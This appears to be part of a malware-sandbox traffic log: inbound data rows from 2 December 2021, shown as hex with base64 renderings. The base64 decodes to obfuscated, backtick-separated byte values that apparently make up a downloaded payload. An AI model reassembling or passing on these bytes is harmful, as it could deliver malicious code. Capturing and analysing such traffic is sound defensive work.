73 59 44 59 78 4c 47 41 78 51 53 78 67 4e 30 55 73 59 45 45 78 4c 47 42 44 51 69 78 67 4f 44 63 73 59 44 56 44 4c 47 41 78 4d 69 78 67 Data Ascii: kUsYEVCLGBFOSxgNkYsYEY1LGA4QixgN0YsYEJGLGAyMCxgMjQsYDc4LGA0RSxgOUQsYEZFLGA2NixgNzYsYDgyLGA5RixgNTMsYDkwLGBERCxgNzksYEY1LGA2RixgQzUsYEFCLGAxRixgRkQsYDRELGA2RixgRkYsYEZELGBGNCxgREUsYEJELGA3RixgM0YsYEY0LGAxQyxgMkUsYDYxLGAxQSxgN0UsYEExLGBDQixgODcsYDVDLGAxMixg
2021-12-02 17:26:37 UTC	46	IN	Data Raw: 42 47 4e 43 78 67 52 6a 59 73 59 45 5a 47 4c 47 42 45 4f 43 78 67 4e 7a 6b 73 59 45 5a 43 4c 47 42 45 4e 79 78 67 51 7a 41 73 59 45 52 43 4c 47 42 44 52 69 78 67 52 6b 55 73 59 44 67 77 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 59 33 4c 47 41 30 51 79 78 67 4e 30 59 73 59 45 46 43 4c 47 41 35 52 69 78 67 52 6b 45 73 59 44 49 7a 4c 47 41 78 52 53 78 67 4d 44 59 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 45 55 34 4c 47 42 47 51 79 78 67 51 6a 63 73 59 44 63 78 4c 47 41 31 4d 69 78 67 52 6a 55 73 59 44 49 33 4c 47 41 79 4d 69 78 67 4d 55 55 73 59 45 5a 42 4c 47 41 30 52 43 78 67 51 7a 4d 73 59 45 51 33 4c 47 42 47 52 69 78 67 52 54 45 73 59 45 5a 47 4c 47 41 78 4f 43 78 67 4d 45 45 73 59 45 59 77 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 64 45 4c Data Ascii: BGNCxgRjYsYEZGLGBEOCxgNzksYEZCLGBENyxgQzAsYERCLGBDRixgRkUsYDgwLGAzRixgRTksYEY3LGA0QyxgN0YsYEFCLGA5RixgRkEsYDIzLGAxRSxgMDYsYDZGLGBGRixgODksYEU4LGBGQyxgQjcsYDcxLGA1MixgRjUsYDI3LGAyMixgMUUsYEZBLGA0RCxgQzMsYEQ3LGBGRixgRTEsYEZGLGAxOCxgMEEsYEYwLGBENyxgRjgsYDdEL
2021-12-02 17:26:37 UTC	48	IN	Data Raw: 73 59 44 45 34 4c 47 42 47 4e 43 78 67 52 6b 4d 73 59 44 4d 33 4c 47 42 42 4d 53 78 67 52 54 63 73 59 45 52 47 4c 47 42 44 4e 43 78 67 51 6b 4d 73 59 45 5a 44 4c 47 41 33 52 69 78 67 52 6b 51 73 59 44 51 32 4c 47 41 33 52 69 78 67 4d 54 4d 73 59 45 59 31 4c 47 42 47 51 79 78 67 4f 54 63 73 59 44 63 32 4c 47 41 31 52 53 78 67 52 6b 59 73 59 45 56 45 4c 47 42 47 4d 53 78 67 52 6b 45 73 59 44 68 47 4c 47 42 43 52 43 78 67 52 6b 49 73 59 44 4e 43 4c 47 42 47 52 53 78 67 52 44 63 73 59 45 59 30 4c 47 41 30 52 69 78 67 52 6b 59 73 59 45 5a 45 4c 47 42 44 51 69 78 67 4d 6a 41 73 59 44 4d 78 4c 47 42 47 4d 53 78 67 4d 44 63 73 59 44 55 77 4c 47 42 44 52 69 78 67 51 6b 59 73 59 44 56 43 4c 47 42 47 52 43 78 67 4e 7a 63 73 59 44 5a 43 4c 47 42 44 52 69 78 67 4e 30 Data Ascii: sYDE4LGBGNCxgRkMsYDM3LGBBMSxgRTcsYERGLGBDNCxgQkMsYEZDLGA3RixgRkQsYDQ2LGA3RixgMTMsYEY1LGBGQyxgOTcsYDc2LGA1RSxgRkYsYEVELGBGMSxgRkEsYDhGLGBCRCxgRkIsYDNCLGBGRSxgRDcsYEY0LGA0RixgRkYsYEZELGBDQixgMjAsYDMxLGBGMSxgMDcsYDUwLGBDRixgQkYsYDVCLGBGRCxgNzcsYDZCLGBDRixgN0
2021-12-02 17:26:37 UTC	49	IN	Data Raw: 52 43 78 67 4d 44 63 73 59 45 5a 47 4c 47 41 31 4d 79 78 67 52 6b 45 73 59 45 52 43 4c 47 42 47 52 53 78 67 4f 54 59 73 59 45 5a 47 4c 47 42 42 4e 69 78 67 4e 6b 59 73 59 44 6b 30 4c 47 41 33 52 69 78 67 51 30 49 73 59 45 4a 47 4c 47 41 34 51 79 78 67 4e 30 45 73 59 45 49 31 4c 47 42 43 4d 69 78 67 52 6a 41 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4e 6a 55 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 44 4e 46 4c 47 41 35 52 43 78 67 4e 54 63 73 59 44 4e 47 4c 47 42 44 4d 79 78 67 51 55 49 73 59 45 4a 47 4c 47 42 47 4e 43 78 67 4d 30 59 73 59 45 5a 47 4c 47 41 79 52 69 78 67 4e 30 55 73 59 45 5a 47 4c 47 42 47 4e 43 78 67 4e 45 59 73 59 45 5a 42 4c 47 42 46 4d 69 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 35 52 43 78 67 4f 44 4d 73 59 45 59 78 4c 47 42 Data Ascii: RCxgMDcsYEZGLGA1MyxgRkEsYERCLGBGRSxgOTYsYEZGLGBBNixgNkYsYDk0LGA3RixgQ0IsYEJGLGA4QyxgN0EsYEI1LGBCMixgRjAsYDlCLGBGRixgNjUsYDNGLGA1NSxgRkYsYDNFLGA5RCxgNTcsYDNGLGBDMyxgQUIsYEJGLGBGNCxgM0YsYEZGLGAyRixgN0UsYEZGLGBGNCxgNEYsYEZBLGBFMixgMzcsYEZFLGA5RCxgODMsYEYxLGB
2021-12-02 17:26:37 UTC	50	IN	Data Raw: 44 52 47 4c 47 42 45 4e 53 78 67 51 6b 59 73 59 45 46 42 4c 47 42 47 4d 79 78 67 52 55 45 73 59 44 6c 47 4c 47 41 34 4e 69 78 67 4e 54 63 73 59 45 49 7a 4c 47 41 33 52 69 78 67 52 55 59 73 59 45 52 47 4c 47 42 47 52 53 78 67 4d 7a 51 73 59 45 5a 45 4c 47 42 45 52 69 78 67 51 6b 59 73 59 45 59 34 4c 47 41 34 52 43 78 67 52 6b 55 73 59 44 67 7a 4c 47 41 34 4d 43 78 67 4e 54 51 73 59 45 4a 47 4c 47 41 79 4e 53 78 67 4e 44 67 73 59 45 49 31 4c 47 42 46 52 43 78 67 4f 54 59 73 59 45 51 78 4c 47 41 33 52 53 78 67 4e 45 49 73 59 44 49 79 4c 47 42 45 4e 53 78 67 4e 6b 59 73 59 45 5a 44 4c 47 41 35 51 69 78 67 4f 44 63 73 59 45 46 47 4c 47 41 33 52 69 78 67 4f 44 55 73 59 45 51 33 4c 47 41 30 4e 79 78 67 4e 30 59 73 59 45 56 42 4c 47 41 7a 52 69 78 67 52 6a 59 73 Data Ascii: DRGLGBENSxgQkYsYEFBLGBGMyxgRUEsYDlGLGA4NixgNTcsYEIzLGA3RixgRUYsYERGLGBGRSxgMzQsYEZELGBERixgQkYsYEY4LGA4RCxgRkUsYDgzLGA4MCxgNTQsYEJGLGAyNSxgNDgsYEI1LGBFRCxgOTYsYEQxLGA3RSxgNEIsYDIyLGBENSxgNkYsYEZDLGA5QixgODcsYEFGLGA3RixgODUsYEQ3LGA0NyxgN0YsYEVBLGAzRixgRjYs
2021-12-02 17:26:37 UTC	52	IN	Data Raw: 78 67 4d 30 45 73 59 44 49 79 4c 47 41 79 4e 53 78 67 52 54 51 73 59 44 6b 32 4c 47 41 30 51 79 78 67 4e 44 63 73 59 44 6b 30 4c 47 41 33 4e 69 78 67 52 55 45 73 59 45 4a 44 4c 47 42 47 51 53 78 67 4e 54 63 73 59 45 55 78 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 55 79 4c 47 42 43 4e 79 78 67 4f 54 6b 73 59 45 5a 44 4c 47 42 43 51 53 78 67 52 54 6b 73 59 44 6b 7a 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 4f 53 78 67 4d 45 59 73 59 45 5a 45 4c 47 41 31 4e 79 78 67 52 54 63 73 59 44 4d 30 4c 47 41 31 4f 53 78 67 4d 6a 4d 73 59 44 46 43 4c 47 41 78 4f 53 78 67 51 30 4d 73 59 44 49 35 4c 47 41 33 52 53 78 67 52 55 45 73 59 45 4a 44 4c 47 42 43 51 53 78 67 51 7a 41 73 59 45 46 43 4c 47 42 47 52 69 78 67 52 6a 67 73 59 44 49 33 4c 47 42 43 52 Data Ascii: xgM0EsYDIyLGAyNSxgRTQsYDk2LGA0QyxgNDcsYDk0LGA3NixgRUEsYEJDLGBGQSxgNTcsYEUxLGBENSxgN0YsYEUyLGBCNyxgOTksYEZDLGBCQSxgRTksYDkzLGBERixgRkIsYEFGLGBGOSxgMEYsYEZELGA1NyxgRTcsYDM0LGA1OSxgMjMsYDFCLGAxOSxgQ0MsYDI5LGA3RSxgRUEsYEJDLGBCQSxgQzAsYEFCLGBGRixgRjgsYDI3LGBCR
2021-12-02 17:26:37 UTC	53	IN	Data Raw: 31 4c 47 42 46 4f 53 78 67 52 55 59 73 59 44 56 44 4c 47 42 47 51 79 78 67 4e 7a 6b 73 59 44 6b 31 4c 47 42 47 52 69 78 67 52 54 59 73 59 44 4e 47 4c 47 41 30 51 79 78 67 4f 44 51 73 59 45 49 32 4c 47 42 45 52 43 78 67 52 6b 55 73 59 45 55 32 4c 47 42 47 52 69 78 67 4d 7a 41 73 59 44 4d 35 4c 47 41 77 4d 69 78 67 4f 55 51 73 59 44 55 33 4c 47 42 47 52 69 78 67 52 54 6b 73 59 44 64 47 4c 47 41 34 51 69 78 67 4e 55 55 73 59 45 5a 45 4c 47 42 44 52 53 78 67 52 45 59 73 59 45 5a 43 4c 47 41 34 4e 79 78 67 4e 30 59 73 59 44 4e 43 4c 47 42 47 52 43 78 67 4e 6b 59 73 59 44 51 32 4c 47 42 47 52 69 78 67 4e 45 45 73 59 45 55 34 4c 47 41 32 51 69 78 67 4d 30 55 73 59 44 49 32 4c 47 41 35 52 53 78 67 52 6b 4d 73 59 44 46 45 4c 47 41 31 52 43 78 67 4d 44 67 73 59 45 Data Ascii: 1LGBFOSxgRUYsYDVDLGBGQyxgNzksYDk1LGBGRixgRTYsYDNGLGA0QyxgODQsYEI2LGBERCxgRkUsYEU2LGBGRixgMzAsYDM5LGAwMixgOUQsYDU3LGBGRixgRTksYDdGLGA4QixgNUUsYEZELGBDRSxgREYsYEZCLGA4NyxgN0YsYDNCLGBGRCxgNkYsYDQ2LGBGRixgNEEsYEU4LGA2QixgM0UsYDI2LGA5RSxgRkMsYDFELGA1RCxgMDgsYE
2021-12-02 17:26:37 UTC	54	IN	Data Raw: 52 6b 51 73 59 44 4d 33 4c 47 42 47 52 53 78 67 52 6a 55 73 59 44 4e 47 4c 47 42 46 52 69 78 67 51 6a 63 73 59 44 52 45 4c 47 41 35 4d 79 78 67 52 45 59 73 59 45 59 79 4c 47 41 7a 4e 79 78 67 4d 44 6b 73 59 44 49 7a 4c 47 41 35 4d 69 78 67 52 45 59 73 59 44 45 31 4c 47 41 35 4e 43 78 67 51 6a 59 73 59 44 45 35 4c 47 42 43 4e 69 78 67 52 6b 59 73 59 45 56 43 4c 47 41 7a 4e 79 78 67 52 6b 45 73 59 44 56 45 4c 47 41 77 4f 53 78 67 52 54 6b 73 59 45 52 47 4c 47 42 47 51 79 78 67 51 6a 63 73 59 44 42 44 4c 47 41 31 52 69 78 67 52 6b 59 73 59 44 52 47 4c 47 42 47 52 53 78 67 4d 45 51 73 59 44 64 42 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 42 4c 47 42 44 52 43 78 67 52 6b 55 73 59 45 4e 46 4c 47 41 7a 52 69 78 67 4d 7a 51 73 59 44 46 45 4c 47 42 47 52 43 78 Data Ascii: RkQsYDM3LGBGRSxgRjUsYDNGLGBFRixgQjcsYDRELGA5MyxgREYsYEYyLGAzNyxgMDksYDIzLGA5MixgREYsYDE1LGA5NCxgQjYsYDE5LGBCNixgRkYsYEVCLGAzNyxgRkEsYDVELGAwOSxgRTksYERGLGBGQyxgQjcsYDBDLGA1RixgRkYsYDRGLGBGRSxgMEQsYDdBLGBGRCxgRkYsYEZBLGBDRCxgRkUsYENFLGAzRixgMzQsYDFELGBGRCx
2021-12-02 17:26:37 UTC	59	IN	Data Raw: 45 4a 47 4c 47 41 79 51 69 78 67 4d 6b 51 73 59 44 49 79 4c 47 41 7a 4f 53 78 67 4e 44 63 73 59 45 55 32 4c 47 41 33 4e 79 78 67 51 54 55 73 59 45 55 31 4c 47 42 47 51 69 78 67 51 30 55 73 59 45 46 43 4c 47 41 32 4d 79 78 67 51 6b 4d 73 59 45 5a 42 4c 47 41 34 4d 79 78 67 52 54 6b 73 59 45 46 47 4c 47 42 47 4e 53 78 67 4d 6a 63 73 59 45 45 30 4c 47 41 35 4e 79 78 67 4e 30 59 73 59 45 59 7a 4c 47 42 42 51 69 78 67 51 6b 59 73 59 45 4d 34 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 45 78 4c 47 41 31 4f 53 78 67 51 7a 63 73 59 45 52 47 4c 47 42 45 4e 69 78 67 52 6b 45 73 59 45 59 32 4c 47 41 34 52 69 78 67 4e 44 67 73 59 45 55 35 4c 47 41 33 4e 69 78 67 4e 55 55 73 59 45 5a 45 4c 47 41 32 4e 53 78 67 52 6b 59 73 59 44 45 79 4c 47 42 43 52 43 78 67 52 6b 45 73 Data Ascii: EJGLGAyQixgMkQsYDIyLGAzOSxgNDcsYEU2LGA3NyxgQTUsYEU1LGBGQixgQ0UsYEFCLGA2MyxgQkMsYEZBLGA4MyxgRTksYEFGLGBGNSxgMjcsYEE0LGA5NyxgN0YsYEYzLGBBQixgQkYsYEM4LGA3RixgRjUsYDExLGA1OSxgQzcsYERGLGBENixgRkEsYEY2LGA4RixgNDgsYEU5LGA3NixgNUUsYEZELGA2NSxgRkYsYDEyLGBCRCxgRkEs
2021-12-02 17:26:37 UTC	63	IN	Data Raw: 41 78 4d 43 78 67 51 30 55 73 59 45 4a 47 4c 47 41 33 51 69 78 67 52 54 63 73 59 45 56 45 4c 47 42 43 52 69 78 67 4d 44 4d 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4f 45 59 73 59 44 6b 7a 4c 47 42 47 52 69 78 67 52 6a 67 73 59 44 52 47 4c 47 41 30 52 53 78 67 4e 30 59 73 59 45 45 33 4c 47 42 46 52 69 78 67 4d 54 55 73 59 45 5a 47 4c 47 41 32 51 53 78 67 52 6a 41 73 59 45 59 32 4c 47 42 42 52 69 78 67 4f 44 45 73 59 44 49 78 4c 47 42 47 52 69 78 67 4d 45 55 73 59 44 59 32 4c 47 41 34 4e 53 78 67 52 6a 55 73 59 45 5a 47 4c 47 42 47 51 53 78 67 4f 45 51 73 59 44 64 46 4c 47 41 77 52 43 78 67 4e 30 45 73 59 45 5a 45 4c 47 41 32 4d 53 78 67 52 54 63 73 59 45 59 31 4c 47 41 79 51 69 78 67 51 6b 4d 73 59 44 64 46 4c 47 42 47 52 43 78 67 52 44 63 73 59 45 5a 46 4c Data Ascii: AxMCxgQ0UsYEJGLGA3QixgRTcsYEVELGBCRixgMDMsYDZGLGBGRixgOEYsYDkzLGBGRixgRjgsYDRGLGA0RSxgN0YsYEE3LGBFRixgMTUsYEZGLGA2QSxgRjAsYEY2LGBBRixgODEsYDIxLGBGRixgMEUsYDY2LGA4NSxgRjUsYEZGLGBGQSxgOEQsYDdFLGAwRCxgN0EsYEZELGA2MSxgRTcsYEY1LGAyQixgQkMsYDdFLGBGRCxgRDcsYEZFL
2021-12-02 17:26:37 UTC	64	IN	Data Raw: 79 4c 47 42 44 4f 53 78 67 4d 30 59 73 59 44 51 31 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 52 43 78 67 52 44 63 73 59 44 68 47 4c 47 42 47 4d 53 78 67 52 6b 45 73 59 44 5a 47 4c 47 42 47 4d 69 78 67 4e 45 59 73 59 45 4a 44 4c 47 42 47 52 43 78 67 51 55 49 73 59 45 51 79 4c 47 42 47 52 69 78 67 52 6b 51 73 59 45 59 33 4c 47 42 47 4f 53 78 67 4e 44 63 73 59 44 4e 47 4c 47 42 47 4d 79 78 67 51 54 6b 73 59 44 63 32 4c 47 41 30 52 43 78 67 4e 54 51 73 59 45 5a 43 4c 47 42 44 51 79 78 67 4d 7a 49 73 59 45 59 34 4c 47 41 7a 4e 53 78 67 52 6a 6b 73 59 45 4a 45 4c 47 41 35 52 43 78 67 4e 54 63 73 59 44 64 47 4c 47 41 7a 52 43 78 67 51 6b 4d 73 59 44 64 42 4c 47 42 47 4d 69 78 67 4e 6b 59 73 59 45 45 33 4c 47 41 33 52 69 78 67 4e 7a 45 73 59 45 Data Ascii: yLGBDOSxgM0YsYDQ1LGBBRixgRkYsYEY1LGA5RCxgRDcsYDhGLGBGMSxgRkEsYDZGLGBGMixgNEYsYEJDLGBGRCxgQUIsYEQyLGBGRixgRkQsYEY3LGBGOSxgNDcsYDNGLGBGMyxgQTksYDc2LGA0RCxgNTQsYEZCLGBDQyxgMzIsYEY4LGAzNSxgRjksYEJELGA5RCxgNTcsYDdGLGAzRCxgQkMsYDdBLGBGMixgNkYsYEE3LGA3RixgNzEsYE
2021-12-02 17:26:37 UTC	68	IN	Data Raw: 52 69 78 67 52 55 45 73 59 45 59 33 4c 47 41 33 51 79 78 67 4e 44 59 73 59 44 45 30 4c 47 42 47 51 69 78 67 4f 45 51 73 59 44 5a 45 4c 47 41 33 4e 69 78 67 52 54 51 73 59 44 68 44 4c 47 41 33 4e 43 78 67 4e 7a 55 73 59 45 55 33 4c 47 42 45 4e 53 78 67 4d 30 59 73 59 44 46 45 4c 47 42 42 52 69 78 67 52 6b 55 73 59 44 4e 46 4c 47 42 46 51 69 78 67 4e 30 59 73 59 45 5a 45 4c 47 42 42 52 69 78 67 4e 45 49 73 59 45 5a 47 4c 47 42 42 4e 53 78 67 4d 30 59 73 59 45 56 43 4c 47 41 77 52 69 78 67 52 6b 49 73 59 44 64 45 4c 47 42 47 52 43 78 67 4e 54 63 73 59 45 5a 47 4c 47 41 32 4e 43 78 67 4e 30 45 73 59 45 59 31 4c 47 41 79 51 69 78 67 51 6a 4d 73 59 44 52 42 4c 47 42 47 4d 79 78 67 4f 55 49 73 59 45 5a 47 4c 47 42 44 4f 53 78 67 4d 30 59 73 59 44 55 31 4c 47 42 Data Ascii: RixgRUEsYEY3LGA3QyxgNDYsYDE0LGBGQixgOEQsYDZELGA3NixgRTQsYDhDLGA3NCxgNzUsYEU3LGBENSxgM0YsYDFELGBBRixgRkUsYDNFLGBFQixgN0YsYEZELGBBRixgNEIsYEZGLGBBNSxgM0YsYEVCLGAwRixgRkIsYDdELGBGRCxgNTcsYEZGLGA2NCxgN0EsYEY1LGAyQixgQjMsYDRBLGBGMyxgOUIsYEZGLGBDOSxgM0YsYDU1LGB
2021-12-02 17:26:37 UTC	72	IN	Data Raw: 6b 55 73 59 45 59 35 4c 47 41 78 4d 79 78 67 52 6b 59 73 59 45 45 35 4c 47 42 43 52 69 78 67 4d 6a 4d 73 59 45 5a 45 4c 47 42 46 4e 79 78 67 52 6b 59 73 59 45 5a 44 4c 47 42 43 51 69 78 67 4f 54 6b 73 59 45 5a 47 4c 47 42 46 51 53 78 67 4d 30 59 73 59 44 51 77 4c 47 42 42 52 69 78 67 52 45 55 73 59 45 49 78 4c 47 41 77 4f 43 78 67 52 6b 59 73 59 44 41 7a 4c 47 41 7a 52 69 78 67 4e 54 55 73 59 45 5a 47 4c 47 42 43 52 43 78 67 4f 55 51 73 59 44 55 33 4c 47 42 47 52 69 78 67 51 6a 63 73 59 44 64 47 4c 47 41 34 4d 43 78 67 4e 55 55 73 59 45 5a 45 4c 47 42 43 52 69 78 67 4d 54 63 73 59 44 56 47 4c 47 42 47 52 43 78 67 51 7a 4d 73 59 45 55 35 4c 47 41 31 52 69 78 67 52 6a 51 73 59 44 6c 43 4c 47 42 47 52 69 78 67 52 6a 4d 73 59 45 55 78 4c 47 42 46 51 53 78 67 Data Ascii: kUsYEY5LGAxMyxgRkYsYEE5LGBCRixgMjMsYEZELGBFNyxgRkYsYEZDLGBCQixgOTksYEZGLGBFQSxgM0YsYDQwLGBBRixgREUsYEIxLGAwOCxgRkYsYDAzLGAzRixgNTUsYEZGLGBCRCxgOUQsYDU3LGBGRixgQjcsYDdGLGA4MCxgNUUsYEZELGBCRixgMTcsYDVGLGBGRCxgQzMsYEU5LGA1RixgRjQsYDlCLGBGRixgRjMsYEUxLGBFQSxg
2021-12-02 17:26:37 UTC	76	IN	Data Raw: 56 47 4c 47 41 32 4f 43 78 67 4f 45 4d 73 59 45 51 35 4c 47 42 47 52 69 78 67 52 6a 55 73 59 44 46 43 4c 47 42 47 52 43 78 67 4e 6a 6b 73 59 44 67 30 4c 47 42 47 4d 79 78 67 4d 30 59 73 59 45 52 45 4c 47 41 33 4f 53 78 67 52 6b 51 73 59 44 52 47 4c 47 42 44 4d 43 78 67 52 55 49 73 59 45 4e 43 4c 47 42 43 52 69 78 67 52 54 55 73 59 44 42 47 4c 47 42 47 4f 53 78 67 4d 6b 51 73 59 45 51 79 4c 47 42 45 52 69 78 67 52 54 6b 73 59 44 56 47 4c 47 42 47 51 53 78 67 4d 44 63 73 59 45 5a 45 4c 47 42 45 4e 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 4e 53 78 67 4f 55 49 73 59 44 64 44 4c 47 41 77 52 53 78 67 4e 6b 59 73 59 45 4d 35 4c 47 41 31 51 69 78 67 4e 44 63 73 59 45 5a 46 4c 47 41 78 51 79 78 67 4d 54 45 73 59 44 56 42 4c 47 42 46 4e 79 78 67 52 6a 55 73 59 Data Ascii: VGLGA2OCxgOEMsYEQ5LGBGRixgRjUsYDFCLGBGRCxgNjksYDg0LGBGMyxgM0YsYERELGA3OSxgRkQsYDRGLGBDMCxgRUIsYENCLGBCRixgRTUsYDBGLGBGOSxgMkQsYEQyLGBERixgRTksYDVGLGBGQSxgMDcsYEZELGBENCxgRkUsYEZGLGBGNSxgOUIsYDdDLGAwRSxgNkYsYEM5LGA1QixgNDcsYEZFLGAxQyxgMTEsYDVBLGBFNyxgRjUsY
2021-12-02 17:26:37 UTC	80	IN	Data Raw: 45 4d 79 78 67 52 55 49 73 59 45 5a 47 4c 47 41 32 4d 43 78 67 52 54 63 73 59 45 59 31 4c 47 42 45 52 69 78 67 4d 54 41 73 59 45 46 47 4c 47 42 47 52 69 78 67 4d 7a 6b 73 59 45 4e 45 4c 47 41 35 52 69 78 67 52 6a 63 73 59 44 49 33 4c 47 42 42 4e 69 78 67 52 6b 59 73 59 45 4d 33 4c 47 42 43 52 69 78 67 52 6a 55 73 59 45 59 33 4c 47 42 47 52 69 78 67 51 7a 45 73 59 45 4d 78 4c 47 42 46 51 69 78 67 4e 7a 4d 73 59 44 55 34 4c 47 41 78 52 43 78 67 4e 6b 59 73 59 44 41 31 4c 47 41 32 51 69 78 67 4e 45 55 73 59 45 46 47 4c 47 42 47 52 69 78 67 52 55 49 73 59 44 6c 45 4c 47 42 45 4e 79 78 67 52 6b 59 73 59 45 49 35 4c 47 42 43 52 69 78 67 4f 54 55 73 59 44 56 46 4c 47 42 47 52 69 78 67 4f 54 6b 73 59 45 4a 47 4c 47 42 46 4e 43 78 67 4f 54 63 73 59 45 5a 45 4c 47 Data Ascii: EMyxgRUIsYEZGLGA2MCxgRTcsYEY1LGBERixgMTAsYEFGLGBGRixgMzksYENELGA5RixgRjcsYDI3LGBBNixgRkYsYEM3LGBCRixgRjUsYEY3LGBGRixgQzEsYEMxLGBFQixgNzMsYDU4LGAxRCxgNkYsYDA1LGA2QixgNEUsYEFGLGBGRixgRUIsYDlELGBENyxgRkYsYEI5LGBCRixgOTUsYDVFLGBGRixgOTksYEJGLGBFNCxgOTcsYEZELG
2021-12-02 17:26:37 UTC	84	IN	Data Raw: 51 7a 4d 73 59 44 64 47 4c 47 42 47 4d 79 78 67 4d 6b 59 73 59 45 45 79 4c 47 41 79 4d 53 78 67 51 6b 49 73 59 45 49 30 4c 47 42 47 4e 53 78 67 4e 55 59 73 59 44 51 30 4c 47 42 46 51 79 78 67 52 44 67 73 59 44 63 35 4c 47 42 47 4e 53 78 67 52 6a 63 73 59 45 4d 32 4c 47 42 42 51 69 78 67 52 6b 59 73 59 45 59 30 4c 47 42 44 4e 53 78 67 52 55 59 73 59 45 59 32 4c 47 41 33 4e 79 78 67 51 54 63 73 59 44 4e 47 4c 47 42 47 4e 69 78 67 4e 30 59 73 59 45 5a 47 4c 47 41 30 4d 53 78 67 51 54 63 73 59 45 5a 46 4c 47 42 42 51 69 78 67 4e 55 59 73 59 44 45 77 4c 47 41 32 4d 79 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 7a 4e 69 78 67 52 55 59 73 59 45 5a 44 4c 47 41 77 4e 53 78 67 51 55 51 73 59 45 49 33 4c 47 41 33 4e 53 78 67 4e 55 55 73 59 45 5a 45 4c 47 41 35 52 43 78 Data Ascii: QzMsYDdGLGBGMyxgMkYsYEEyLGAyMSxgQkIsYEI0LGBGNSxgNUYsYDQ0LGBFQyxgRDgsYDc5LGBGNSxgRjcsYEM2LGBBQixgRkYsYEY0LGBDNSxgRUYsYEY2LGA3NyxgQTcsYDNGLGBGNixgN0YsYEZGLGA0MSxgQTcsYEZFLGBBQixgNUYsYDEwLGA2MyxgRkMsYEU2LGAzNixgRUYsYEZDLGAwNSxgQUQsYEI3LGA3NSxgNUUsYEZELGA5RCx
2021-12-02 17:26:37 UTC	89	IN	Data Raw: 44 63 77 4c 47 42 43 4d 53 78 67 52 45 49 73 59 44 4a 47 4c 47 41 34 4d 43 78 67 51 6a 63 73 59 45 51 77 4c 47 41 33 4f 53 78 67 52 6b 51 73 59 45 56 47 4c 47 42 46 4e 69 78 67 52 44 63 73 59 45 5a 47 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 55 35 4c 47 41 7a 52 69 78 67 4e 45 4d 73 59 44 64 47 4c 47 41 35 51 69 78 67 51 6a 4d 73 59 45 4a 47 4c 47 42 46 4d 79 78 67 51 6b 59 73 59 45 59 32 4c 47 41 7a 51 69 78 67 52 6b 55 73 59 45 59 78 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 44 4d 33 4c 47 41 33 4d 53 78 67 4e 54 49 73 59 45 59 30 4c 47 42 46 4d 79 78 67 51 54 51 73 59 44 6c 45 4c 47 41 7a 51 69 78 67 4e 6b 59 73 59 45 5a 46 4c 47 41 34 4d 53 78 67 4e 7a 67 73 59 45 59 7a 4c 47 41 31 52 69 78 67 52 6b 4d 73 59 45 4e 45 4c 47 42 47 52 53 78 67 52 6a 67 73 Data Ascii: DcwLGBCMSxgREIsYDJGLGA4MCxgQjcsYEQwLGA3OSxgRkQsYEVGLGBFNixgRDcsYEZGLGBFRixgRkYsYEU5LGAzRixgNEMsYDdGLGA5QixgQjMsYEJGLGBFMyxgQkYsYEY2LGAzQixgRkUsYEYxLGBERixgRkMsYDM3LGA3MSxgNTIsYEY0LGBFMyxgQTQsYDlELGAzQixgNkYsYEZFLGA4MSxgNzgsYEYzLGA1RixgRkMsYENELGBGRSxgRjgs
2021-12-02 17:26:37 UTC	93	IN	Data Raw: 41 77 4e 79 78 67 52 44 63 73 59 45 5a 47 4c 47 42 45 51 69 78 67 4e 44 45 73 59 45 5a 42 4c 47 42 46 4f 43 78 67 51 7a 63 73 59 45 5a 47 4c 47 42 47 51 53 78 67 4f 54 45 73 59 45 5a 47 4c 47 42 46 51 53 78 67 51 6b 59 73 59 44 52 45 4c 47 41 78 4e 43 78 67 4e 30 55 73 59 44 5a 42 4c 47 41 31 51 79 78 67 4f 44 45 73 59 45 52 47 4c 47 42 47 51 79 78 67 52 45 59 73 59 45 45 32 4c 47 41 30 4e 43 78 67 4e 55 49 73 59 45 55 33 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 5a 46 4c 47 41 79 52 69 78 67 51 54 45 73 59 44 55 33 4c 47 42 45 52 69 78 67 4d 30 4d 73 59 45 59 35 4c 47 42 42 4e 79 78 67 4e 30 55 73 59 44 6b 7a 4c 47 42 43 4e 43 78 67 4d 6b 51 73 59 45 5a 46 4c 47 42 46 4d 43 78 67 4d 30 59 73 59 45 52 42 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 46 47 4c Data Ascii: AwNyxgRDcsYEZGLGBEQixgNDEsYEZBLGBFOCxgQzcsYEZGLGBGQSxgOTEsYEZGLGBFQSxgQkYsYDRELGAxNCxgN0UsYDZBLGA1QyxgODEsYERGLGBGQyxgREYsYEE2LGA0NCxgNUIsYEU3LGBENSxgN0YsYEZFLGAyRixgQTEsYDU3LGBERixgM0MsYEY5LGBBNyxgN0UsYDkzLGBCNCxgMkQsYEZFLGBFMCxgM0YsYERBLGA3RixgRjUsYDFGL
